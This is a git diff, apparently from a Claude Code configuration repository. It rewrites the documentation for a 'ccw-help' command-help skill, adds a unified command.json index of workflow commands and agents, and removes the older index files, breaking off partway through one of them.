2. Read source file via `source` path (e.g., `commands/workflow/lite-plan.md`)
|
||||
3. Extract relevant sections and provide context-specific examples
|
||||
1. Locate command in `command.json`
|
||||
2. Read source file via `source` path
|
||||
3. Provide context-specific examples
|
||||
|
||||
### Mode 4: Beginner Onboarding 🎓
|
||||
### Mode 4: Beginner Onboarding
|
||||
|
||||
**Triggers**: "新手", "getting started", "如何开始", "常用命令"
|
||||
**Triggers**: "新手", "getting started", "常用命令"
|
||||
|
||||
**Process**:
|
||||
1. Query `index/essential-commands.json`
|
||||
2. Assess project stage (从0到1 vs 功能新增)
|
||||
3. Guide appropriate workflow entry point
|
||||
1. Query `essential_commands` array
|
||||
2. Guide appropriate workflow entry point
|
||||
|
||||
### Mode 5: Issue Reporting 📝
|
||||
### Mode 5: Issue Reporting
|
||||
|
||||
**Triggers**: "CCW-issue", "报告 bug", "功能建议", "问题咨询"
|
||||
**Triggers**: "ccw-issue", "报告 bug"
|
||||
|
||||
**Process**:
|
||||
1. Use AskUserQuestion to gather context
|
||||
2. Generate structured issue template
|
||||
3. Provide actionable next steps
|
||||
|
||||
### Mode 6: Deep Analysis 🔬
|
||||
## Data Source
|
||||
|
||||
**Triggers**: "详细说明", "命令原理", "agent 如何工作", "实现细节"
|
||||
Single source of truth: **[command.json](command.json)**
|
||||
|
||||
**Process**:
|
||||
1. Read source documentation directly
|
||||
2. For complex queries, use CLI for multi-file analysis:
|
||||
```bash
|
||||
ccw cli -p "PURPOSE: Analyze command documentation..." --tool gemini --mode analysis --cd ~/.claude
|
||||
```
|
||||
|
||||
## Index Files
|
||||
|
||||
CCW-Help 使用 JSON 索引实现快速查询(无 reference 文件夹,直接引用源文件):
|
||||
|
||||
| 文件 | 内容 | 用途 |
|
||||
|------|------|------|
|
||||
| `index/all-commands.json` | 完整命令目录 | 关键词搜索 |
|
||||
| `index/all-agents.json` | 完整 Agent 目录 | Agent 查询 |
|
||||
| `index/by-category.json` | 按类别分组 | 分类浏览 |
|
||||
| `index/by-use-case.json` | 按场景分组 | 场景推荐 |
|
||||
| `index/essential-commands.json` | 核心命令 | 新手引导 |
|
||||
| `index/command-relationships.json` | 命令关系 | 下一步推荐 |
|
||||
| Field | Purpose |
|
||||
|-------|---------|
|
||||
| `commands[]` | Flat command list with metadata |
|
||||
| `commands[].flow` | Relationships (next_steps, prerequisites) |
|
||||
| `commands[].essential` | Essential flag for onboarding |
|
||||
| `agents[]` | Agent directory |
|
||||
| `essential_commands[]` | Core commands list |
|
||||
|
||||
### Source Path Format
|
||||
|
||||
索引中的 `source` 字段是从 `index/` 目录的相对路径(先向上再定位):
|
||||
`source` 字段是相对路径(从 `skills/ccw-help/` 目录):
|
||||
|
||||
```json
|
||||
{
|
||||
"name": "workflow:lite-plan",
|
||||
"name": "lite-plan",
|
||||
"source": "../../../commands/workflow/lite-plan.md"
|
||||
}
|
||||
```
|
||||
|
||||
路径结构: `index/` → `ccw-help/` → `skills/` → `.claude/` → `commands/...`
|
||||
|
||||
## Configuration
|
||||
|
||||
| 参数 | 默认值 | 说明 |
|
||||
|------|--------|------|
|
||||
| max_results | 5 | 搜索返回最大结果数 |
|
||||
| show_source | true | 是否显示源文件路径 |
|
||||
|
||||
## CLI Integration
|
||||
|
||||
| 场景 | CLI Hint | 用途 |
|
||||
|------|----------|------|
|
||||
| 复杂查询 | `gemini --mode analysis` | 多文件分析对比 |
|
||||
| 文档生成 | - | 直接读取源文件 |
|
||||
|
||||
## Slash Commands
|
||||
|
||||
```bash
|
||||
@@ -145,33 +92,25 @@ CCW-Help 使用 JSON 索引实现快速查询(无 reference 文件夹,直接
|
||||
|
||||
## Maintenance
|
||||
|
||||
### 更新索引
|
||||
### Update Index
|
||||
|
||||
```bash
|
||||
cd D:/Claude_dms3/.claude/skills/ccw-help
|
||||
python scripts/analyze_commands.py
|
||||
```
|
||||
|
||||
脚本功能:
|
||||
1. 扫描 `commands/` 和 `agents/` 目录
|
||||
2. 提取 YAML frontmatter 元数据
|
||||
3. 生成相对路径引用(无 reference 复制)
|
||||
4. 重建所有索引文件
|
||||
脚本功能:扫描 commands/ 和 agents/ 目录,生成统一的 command.json
|
||||
|
||||
## System Statistics
|
||||
## Statistics
|
||||
|
||||
- **Commands**: 78
|
||||
- **Agents**: 14
|
||||
- **Categories**: 5 (workflow, cli, memory, task, general)
|
||||
- **Essential**: 14 核心命令
|
||||
- **Commands**: 88+
|
||||
- **Agents**: 16
|
||||
- **Essential**: 10 核心命令
|
||||
|
||||
## Core Principle
|
||||
|
||||
**⚠️ 智能整合,非模板复制**
|
||||
**智能整合,非模板复制**
|
||||
|
||||
- ✅ 理解用户具体情况
|
||||
- ✅ 整合多个来源信息
|
||||
- ✅ 定制示例和说明
|
||||
- ✅ 提供渐进式深度
|
||||
- ❌ 原样复制文档
|
||||
- ❌ 返回未处理的 JSON
|
||||
- 理解用户具体情况
|
||||
- 整合多个来源信息
|
||||
- 定制示例和说明
|
||||
|
||||
520
.claude/skills/ccw-help/command.json
Normal file
520
.claude/skills/ccw-help/command.json
Normal file
@@ -0,0 +1,520 @@
|
||||
{
|
||||
"_metadata": {
|
||||
"version": "2.0.0",
|
||||
"total_commands": 45,
|
||||
"total_agents": 16,
|
||||
"description": "Unified CCW-Help command index"
|
||||
},
|
||||
|
||||
"essential_commands": [
|
||||
"/workflow:lite-plan",
|
||||
"/workflow:lite-fix",
|
||||
"/workflow:plan",
|
||||
"/workflow:execute",
|
||||
"/workflow:session:start",
|
||||
"/workflow:review-session-cycle",
|
||||
"/memory:docs",
|
||||
"/workflow:brainstorm:artifacts",
|
||||
"/workflow:action-plan-verify",
|
||||
"/version"
|
||||
],
|
||||
|
||||
"commands": [
|
||||
{
|
||||
"name": "lite-plan",
|
||||
"command": "/workflow:lite-plan",
|
||||
"description": "Lightweight interactive planning with in-memory plan, dispatches to lite-execute",
|
||||
"arguments": "[-e|--explore] \"task\"|file.md",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"essential": true,
|
||||
"flow": {
|
||||
"next_steps": ["/workflow:lite-execute"],
|
||||
"alternatives": ["/workflow:plan"]
|
||||
},
|
||||
"source": "../../../commands/workflow/lite-plan.md"
|
||||
},
|
||||
{
|
||||
"name": "lite-execute",
|
||||
"command": "/workflow:lite-execute",
|
||||
"description": "Execute based on in-memory plan or prompt",
|
||||
"arguments": "[--in-memory] \"task\"|file-path",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"flow": {
|
||||
"prerequisites": ["/workflow:lite-plan", "/workflow:lite-fix"]
|
||||
},
|
||||
"source": "../../../commands/workflow/lite-execute.md"
|
||||
},
|
||||
{
|
||||
"name": "lite-fix",
|
||||
"command": "/workflow:lite-fix",
|
||||
"description": "Lightweight bug diagnosis and fix with optional hotfix mode",
|
||||
"arguments": "[--hotfix] \"bug description\"",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"essential": true,
|
||||
"flow": {
|
||||
"next_steps": ["/workflow:lite-execute"],
|
||||
"alternatives": ["/workflow:lite-plan"]
|
||||
},
|
||||
"source": "../../../commands/workflow/lite-fix.md"
|
||||
},
|
||||
{
|
||||
"name": "plan",
|
||||
"command": "/workflow:plan",
|
||||
"description": "5-phase planning with task JSON generation",
|
||||
"arguments": "\"description\"|file.md",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"essential": true,
|
||||
"flow": {
|
||||
"next_steps": ["/workflow:action-plan-verify", "/workflow:execute"],
|
||||
"alternatives": ["/workflow:tdd-plan"]
|
||||
},
|
||||
"source": "../../../commands/workflow/plan.md"
|
||||
},
|
||||
{
|
||||
"name": "execute",
|
||||
"command": "/workflow:execute",
|
||||
"description": "Coordinate agent execution with DAG parallel processing",
|
||||
"arguments": "[--resume-session=\"session-id\"]",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"essential": true,
|
||||
"flow": {
|
||||
"prerequisites": ["/workflow:plan", "/workflow:tdd-plan"],
|
||||
"next_steps": ["/workflow:review"]
|
||||
},
|
||||
"source": "../../../commands/workflow/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "action-plan-verify",
|
||||
"command": "/workflow:action-plan-verify",
|
||||
"description": "Cross-artifact consistency analysis",
|
||||
"arguments": "[--session session-id]",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"essential": true,
|
||||
"flow": {
|
||||
"prerequisites": ["/workflow:plan"],
|
||||
"next_steps": ["/workflow:execute"]
|
||||
},
|
||||
"source": "../../../commands/workflow/action-plan-verify.md"
|
||||
},
|
||||
{
|
||||
"name": "init",
|
||||
"command": "/workflow:init",
|
||||
"description": "Initialize project-level state",
|
||||
"arguments": "[--regenerate]",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/init.md"
|
||||
},
|
||||
{
|
||||
"name": "clean",
|
||||
"command": "/workflow:clean",
|
||||
"description": "Intelligent code cleanup with stale artifact discovery",
|
||||
"arguments": "[--dry-run] [\"focus\"]",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/clean.md"
|
||||
},
|
||||
{
|
||||
"name": "debug",
|
||||
"command": "/workflow:debug",
|
||||
"description": "Hypothesis-driven debugging with NDJSON logging",
|
||||
"arguments": "\"bug description\"",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/debug.md"
|
||||
},
|
||||
{
|
||||
"name": "replan",
|
||||
"command": "/workflow:replan",
|
||||
"description": "Interactive workflow replanning",
|
||||
"arguments": "[--session id] [task-id] \"requirements\"",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/replan.md"
|
||||
},
|
||||
{
|
||||
"name": "session:start",
|
||||
"command": "/workflow:session:start",
|
||||
"description": "Start or discover workflow sessions",
|
||||
"arguments": "[--type <workflow|review|tdd>] [--auto|--new]",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"difficulty": "Intermediate",
|
||||
"essential": true,
|
||||
"flow": {
|
||||
"next_steps": ["/workflow:plan", "/workflow:execute"]
|
||||
},
|
||||
"source": "../../../commands/workflow/session/start.md"
|
||||
},
|
||||
{
|
||||
"name": "session:list",
|
||||
"command": "/workflow:session:list",
|
||||
"description": "List all workflow sessions",
|
||||
"arguments": "",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"difficulty": "Beginner",
|
||||
"source": "../../../commands/workflow/session/list.md"
|
||||
},
|
||||
{
|
||||
"name": "session:resume",
|
||||
"command": "/workflow:session:resume",
|
||||
"description": "Resume paused workflow session",
|
||||
"arguments": "",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/resume.md"
|
||||
},
|
||||
{
|
||||
"name": "session:complete",
|
||||
"command": "/workflow:session:complete",
|
||||
"description": "Mark session complete and archive",
|
||||
"arguments": "",
|
||||
"category": "workflow",
|
||||
"subcategory": "session",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/session/complete.md"
|
||||
},
|
||||
{
|
||||
"name": "brainstorm:auto-parallel",
|
||||
"command": "/workflow:brainstorm:auto-parallel",
|
||||
"description": "Parallel brainstorming with multi-role analysis",
|
||||
"arguments": "\"topic\" [--count N]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/brainstorm/auto-parallel.md"
|
||||
},
|
||||
{
|
||||
"name": "brainstorm:artifacts",
|
||||
"command": "/workflow:brainstorm:artifacts",
|
||||
"description": "Interactive clarification with guidance specification",
|
||||
"arguments": "\"topic\" [--count N]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"difficulty": "Intermediate",
|
||||
"essential": true,
|
||||
"source": "../../../commands/workflow/brainstorm/artifacts.md"
|
||||
},
|
||||
{
|
||||
"name": "brainstorm:synthesis",
|
||||
"command": "/workflow:brainstorm:synthesis",
|
||||
"description": "Refine role analyses through Q&A",
|
||||
"arguments": "[--session session-id]",
|
||||
"category": "workflow",
|
||||
"subcategory": "brainstorm",
|
||||
"difficulty": "Advanced",
|
||||
"source": "../../../commands/workflow/brainstorm/synthesis.md"
|
||||
},
|
||||
{
|
||||
"name": "tdd-plan",
|
||||
"command": "/workflow:tdd-plan",
|
||||
"description": "TDD planning with Red-Green-Refactor cycles",
|
||||
"arguments": "\"feature\"|file.md",
|
||||
"category": "workflow",
|
||||
"difficulty": "Advanced",
|
||||
"flow": {
|
||||
"next_steps": ["/workflow:execute", "/workflow:tdd-verify"],
|
||||
"alternatives": ["/workflow:plan"]
|
||||
},
|
||||
"source": "../../../commands/workflow/tdd-plan.md"
|
||||
},
|
||||
{
|
||||
"name": "tdd-verify",
|
||||
"command": "/workflow:tdd-verify",
|
||||
"description": "Verify TDD compliance with coverage analysis",
|
||||
"arguments": "[session-id]",
|
||||
"category": "workflow",
|
||||
"difficulty": "Advanced",
|
||||
"flow": {
|
||||
"prerequisites": ["/workflow:execute"]
|
||||
},
|
||||
"source": "../../../commands/workflow/tdd-verify.md"
|
||||
},
|
||||
{
|
||||
"name": "review",
|
||||
"command": "/workflow:review",
|
||||
"description": "Post-implementation review (security/architecture/quality)",
|
||||
"arguments": "[--type=<type>] [session-id]",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review.md"
|
||||
},
|
||||
{
|
||||
"name": "review-session-cycle",
|
||||
"command": "/workflow:review-session-cycle",
|
||||
"description": "Multi-dimensional code review across 7 dimensions",
|
||||
"arguments": "[session-id] [--dimensions=...]",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"essential": true,
|
||||
"flow": {
|
||||
"prerequisites": ["/workflow:execute"],
|
||||
"next_steps": ["/workflow:review-fix"]
|
||||
},
|
||||
"source": "../../../commands/workflow/review-session-cycle.md"
|
||||
},
|
||||
{
|
||||
"name": "review-module-cycle",
|
||||
"command": "/workflow:review-module-cycle",
|
||||
"description": "Module-based multi-dimensional review",
|
||||
"arguments": "<path-pattern> [--dimensions=...]",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/review-module-cycle.md"
|
||||
},
|
||||
{
|
||||
"name": "review-fix",
|
||||
"command": "/workflow:review-fix",
|
||||
"description": "Automated fixing of review findings",
|
||||
"arguments": "<export-file|review-dir>",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"flow": {
|
||||
"prerequisites": ["/workflow:review-session-cycle", "/workflow:review-module-cycle"]
|
||||
},
|
||||
"source": "../../../commands/workflow/review-fix.md"
|
||||
},
|
||||
{
|
||||
"name": "test-gen",
|
||||
"command": "/workflow:test-gen",
|
||||
"description": "Generate test session from implementation",
|
||||
"arguments": "source-session-id",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/test-gen.md"
|
||||
},
|
||||
{
|
||||
"name": "test-fix-gen",
|
||||
"command": "/workflow:test-fix-gen",
|
||||
"description": "Create test-fix session with strategy",
|
||||
"arguments": "session-id|\"description\"|file",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/test-fix-gen.md"
|
||||
},
|
||||
{
|
||||
"name": "test-cycle-execute",
|
||||
"command": "/workflow:test-cycle-execute",
|
||||
"description": "Execute test-fix with iterative cycles",
|
||||
"arguments": "[--resume-session=id] [--max-iterations=N]",
|
||||
"category": "workflow",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/workflow/test-cycle-execute.md"
|
||||
},
|
||||
{
|
||||
"name": "issue:new",
|
||||
"command": "/issue:new",
|
||||
"description": "Create issue from GitHub URL or text",
|
||||
"arguments": "<url|text> [--priority 1-5]",
|
||||
"category": "issue",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/new.md"
|
||||
},
|
||||
{
|
||||
"name": "issue:discover",
|
||||
"command": "/issue:discover",
|
||||
"description": "Discover issues from multiple perspectives",
|
||||
"arguments": "<path> [--perspectives=...]",
|
||||
"category": "issue",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/discover.md"
|
||||
},
|
||||
{
|
||||
"name": "issue:plan",
|
||||
"command": "/issue:plan",
|
||||
"description": "Batch plan issue resolution",
|
||||
"arguments": "--all-pending|<ids>",
|
||||
"category": "issue",
|
||||
"difficulty": "Intermediate",
|
||||
"flow": {
|
||||
"next_steps": ["/issue:queue"]
|
||||
},
|
||||
"source": "../../../commands/issue/plan.md"
|
||||
},
|
||||
{
|
||||
"name": "issue:queue",
|
||||
"command": "/issue:queue",
|
||||
"description": "Form execution queue from solutions",
|
||||
"arguments": "[--rebuild]",
|
||||
"category": "issue",
|
||||
"difficulty": "Intermediate",
|
||||
"flow": {
|
||||
"prerequisites": ["/issue:plan"],
|
||||
"next_steps": ["/issue:execute"]
|
||||
},
|
||||
"source": "../../../commands/issue/queue.md"
|
||||
},
|
||||
{
|
||||
"name": "issue:execute",
|
||||
"command": "/issue:execute",
|
||||
"description": "Execute queue with DAG parallel",
|
||||
"arguments": "[--worktree]",
|
||||
"category": "issue",
|
||||
"difficulty": "Intermediate",
|
||||
"flow": {
|
||||
"prerequisites": ["/issue:queue"]
|
||||
},
|
||||
"source": "../../../commands/issue/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "docs",
|
||||
"command": "/memory:docs",
|
||||
"description": "Plan documentation workflow",
|
||||
"arguments": "[path] [--tool <tool>]",
|
||||
"category": "memory",
|
||||
"difficulty": "Intermediate",
|
||||
"essential": true,
|
||||
"flow": {
|
||||
"next_steps": ["/workflow:execute"]
|
||||
},
|
||||
"source": "../../../commands/memory/docs.md"
|
||||
},
|
||||
{
|
||||
"name": "update-related",
|
||||
"command": "/memory:update-related",
|
||||
"description": "Update docs for git-changed modules",
|
||||
"arguments": "[--tool <tool>]",
|
||||
"category": "memory",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/update-related.md"
|
||||
},
|
||||
{
|
||||
"name": "update-full",
|
||||
"command": "/memory:update-full",
|
||||
"description": "Update all CLAUDE.md files",
|
||||
"arguments": "[--tool <tool>]",
|
||||
"category": "memory",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/update-full.md"
|
||||
},
|
||||
{
|
||||
"name": "skill-memory",
|
||||
"command": "/memory:skill-memory",
|
||||
"description": "Generate SKILL.md with loading index",
|
||||
"arguments": "[path] [--regenerate]",
|
||||
"category": "memory",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/skill-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "load-skill-memory",
|
||||
"command": "/memory:load-skill-memory",
|
||||
"description": "Activate SKILL package for task",
|
||||
"arguments": "[skill_name] \"task intent\"",
|
||||
"category": "memory",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/load-skill-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "load",
|
||||
"command": "/memory:load",
|
||||
"description": "Load project context via CLI",
|
||||
"arguments": "[--tool <tool>] \"context\"",
|
||||
"category": "memory",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/load.md"
|
||||
},
|
||||
{
|
||||
"name": "compact",
|
||||
"command": "/memory:compact",
|
||||
"description": "Compact session memory for recovery",
|
||||
"arguments": "[description]",
|
||||
"category": "memory",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/compact.md"
|
||||
},
|
||||
{
|
||||
"name": "task:create",
|
||||
"command": "/task:create",
|
||||
"description": "Generate task JSON from description",
|
||||
"arguments": "\"task title\"",
|
||||
"category": "task",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/create.md"
|
||||
},
|
||||
{
|
||||
"name": "task:execute",
|
||||
"command": "/task:execute",
|
||||
"description": "Execute task JSON with agent",
|
||||
"arguments": "task-id",
|
||||
"category": "task",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "task:breakdown",
|
||||
"command": "/task:breakdown",
|
||||
"description": "Decompose task into subtasks",
|
||||
"arguments": "task-id",
|
||||
"category": "task",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/breakdown.md"
|
||||
},
|
||||
{
|
||||
"name": "task:replan",
|
||||
"command": "/task:replan",
|
||||
"description": "Update task with new requirements",
|
||||
"arguments": "task-id [\"text\"|file]",
|
||||
"category": "task",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/task/replan.md"
|
||||
},
|
||||
{
|
||||
"name": "version",
|
||||
"command": "/version",
|
||||
"description": "Display version and check updates",
|
||||
"arguments": "",
|
||||
"category": "general",
|
||||
"difficulty": "Beginner",
|
||||
"essential": true,
|
||||
"source": "../../../commands/version.md"
|
||||
},
|
||||
{
|
||||
"name": "enhance-prompt",
|
||||
"command": "/enhance-prompt",
|
||||
"description": "Transform prompts with session memory",
|
||||
"arguments": "user input",
|
||||
"category": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/enhance-prompt.md"
|
||||
},
|
||||
{
|
||||
"name": "cli-init",
|
||||
"command": "/cli:cli-init",
|
||||
"description": "Initialize CLI tool configurations (.gemini/, .qwen/) with technology-aware ignore rules",
|
||||
"arguments": "[--tool gemini|qwen|all] [--preview] [--output path]",
|
||||
"category": "cli",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/cli/cli-init.md"
|
||||
}
|
||||
],
|
||||
|
||||
"agents": [
|
||||
{ "name": "action-planning-agent", "description": "Task planning and generation", "source": "../../../agents/action-planning-agent.md" },
|
||||
{ "name": "cli-execution-agent", "description": "CLI tool execution", "source": "../../../agents/cli-execution-agent.md" },
|
||||
{ "name": "cli-explore-agent", "description": "Codebase exploration", "source": "../../../agents/cli-explore-agent.md" },
|
||||
{ "name": "cli-lite-planning-agent", "description": "Lightweight planning", "source": "../../../agents/cli-lite-planning-agent.md" },
|
||||
{ "name": "cli-planning-agent", "description": "CLI-based planning", "source": "../../../agents/cli-planning-agent.md" },
|
||||
{ "name": "code-developer", "description": "Code implementation", "source": "../../../agents/code-developer.md" },
|
||||
{ "name": "conceptual-planning-agent", "description": "Conceptual analysis", "source": "../../../agents/conceptual-planning-agent.md" },
|
||||
{ "name": "context-search-agent", "description": "Context discovery", "source": "../../../agents/context-search-agent.md" },
|
||||
{ "name": "doc-generator", "description": "Documentation generation", "source": "../../../agents/doc-generator.md" },
|
||||
{ "name": "issue-plan-agent", "description": "Issue planning", "source": "../../../agents/issue-plan-agent.md" },
|
||||
{ "name": "issue-queue-agent", "description": "Issue queue formation", "source": "../../../agents/issue-queue-agent.md" },
|
||||
{ "name": "memory-bridge", "description": "Documentation coordination", "source": "../../../agents/memory-bridge.md" },
|
||||
{ "name": "test-context-search-agent", "description": "Test context collection", "source": "../../../agents/test-context-search-agent.md" },
|
||||
{ "name": "test-fix-agent", "description": "Test execution and fixing", "source": "../../../agents/test-fix-agent.md" },
|
||||
{ "name": "ui-design-agent", "description": "UI design and prototyping", "source": "../../../agents/ui-design-agent.md" },
|
||||
{ "name": "universal-executor", "description": "Universal task execution", "source": "../../../agents/universal-executor.md" }
|
||||
],
|
||||
|
||||
"categories": ["workflow", "issue", "memory", "task", "general", "cli"]
|
||||
}
|
||||
@@ -1,82 +0,0 @@
|
||||
[
|
||||
{
|
||||
"name": "action-planning-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/action-planning-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "cli-execution-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/cli-execution-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "cli-explore-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/cli-explore-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "cli-lite-planning-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/cli-lite-planning-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "cli-planning-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/cli-planning-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "code-developer",
|
||||
"description": "|",
|
||||
"source": "../../../agents/code-developer.md"
|
||||
},
|
||||
{
|
||||
"name": "conceptual-planning-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/conceptual-planning-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "context-search-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/context-search-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "doc-generator",
|
||||
"description": "|",
|
||||
"source": "../../../agents/doc-generator.md"
|
||||
},
|
||||
{
|
||||
"name": "issue-plan-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/issue-plan-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "issue-queue-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/issue-queue-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "memory-bridge",
|
||||
"description": "Execute complex project documentation updates using script coordination",
|
||||
"source": "../../../agents/memory-bridge.md"
|
||||
},
|
||||
{
|
||||
"name": "test-context-search-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/test-context-search-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "test-fix-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/test-fix-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "ui-design-agent",
|
||||
"description": "|",
|
||||
"source": "../../../agents/ui-design-agent.md"
|
||||
},
|
||||
{
|
||||
"name": "universal-executor",
|
||||
"description": "|",
|
||||
"source": "../../../agents/universal-executor.md"
|
||||
}
|
||||
]
|
||||
@@ -1,882 +0,0 @@
|
||||
[
|
||||
{
|
||||
"name": "cli-init",
|
||||
"command": "/cli:cli-init",
|
||||
"description": "Generate .gemini/ and .qwen/ config directories with settings.json and ignore files based on workspace technology detection",
|
||||
"arguments": "[--tool gemini|qwen|all] [--output path] [--preview]",
|
||||
"category": "cli",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/cli/cli-init.md"
|
||||
},
|
||||
{
|
||||
"name": "enhance-prompt",
|
||||
"command": "/enhance-prompt",
|
||||
"description": "Enhanced prompt transformation using session memory and intent analysis with --enhance flag detection",
|
||||
"arguments": "user input to enhance",
|
||||
"category": "general",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/enhance-prompt.md"
|
||||
},
|
||||
{
|
||||
"name": "issue:discover",
|
||||
"command": "/issue:discover",
|
||||
"description": "Discover potential issues from multiple perspectives (bug, UX, test, quality, security, performance, maintainability, best-practices) using CLI explore. Supports Exa external research for security and best-practices perspectives.",
|
||||
"arguments": "<path-pattern> [--perspectives=bug,ux,...] [--external]",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/discover.md"
|
||||
},
|
||||
{
|
||||
"name": "execute",
|
||||
"command": "/issue:execute",
|
||||
"description": "Execute queue with codex using DAG-based parallel orchestration (solution-level)",
|
||||
"arguments": "[--worktree] [--queue <queue-id>]",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "implementation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/execute.md"
|
||||
},
|
||||
{
|
||||
"name": "new",
|
||||
"command": "/issue:new",
|
||||
"description": "Create structured issue from GitHub URL or text description",
|
||||
"arguments": "<github-url | text-description> [--priority 1-5]",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/new.md"
|
||||
},
|
||||
{
|
||||
"name": "plan",
|
||||
"command": "/issue:plan",
|
||||
"description": "Batch plan issue resolution using issue-plan-agent (explore + plan closed-loop)",
|
||||
"arguments": "--all-pending <issue-id>[,<issue-id>,...] [--batch-size 3] ",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "planning",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/plan.md"
|
||||
},
|
||||
{
|
||||
"name": "queue",
|
||||
"command": "/issue:queue",
|
||||
"description": "Form execution queue from bound solutions using issue-queue-agent (solution-level)",
|
||||
"arguments": "[--rebuild] [--issue <id>]",
|
||||
"category": "issue",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "general",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/issue/queue.md"
|
||||
},
|
||||
{
|
||||
"name": "code-map-memory",
|
||||
"command": "/memory:code-map-memory",
|
||||
"description": "3-phase orchestrator: parse feature keyword → cli-explore-agent analyzes (Deep Scan dual-source) → orchestrator generates Mermaid docs + SKILL package (skips phase 2 if exists)",
|
||||
"arguments": "\\\"feature-keyword\\\" [--regenerate] [--tool <gemini|qwen>]",
|
||||
"category": "memory",
|
||||
"subcategory": null,
|
||||
"usage_scenario": "documentation",
|
||||
"difficulty": "Intermediate",
|
||||
"source": "../../../commands/memory/code-map-memory.md"
|
||||
},
|
||||
{
|
||||
"name": "compact",
|
||||
"command": "/memory:compact",
|
||||
"description": "Compact current session memory into structured text for session recovery, extracting objective/plan/files/decisions/constraints/state, and save via MCP core_memory tool",
|
||||
"arguments": "[optional: session description]",
|
||||
"category": "memory",
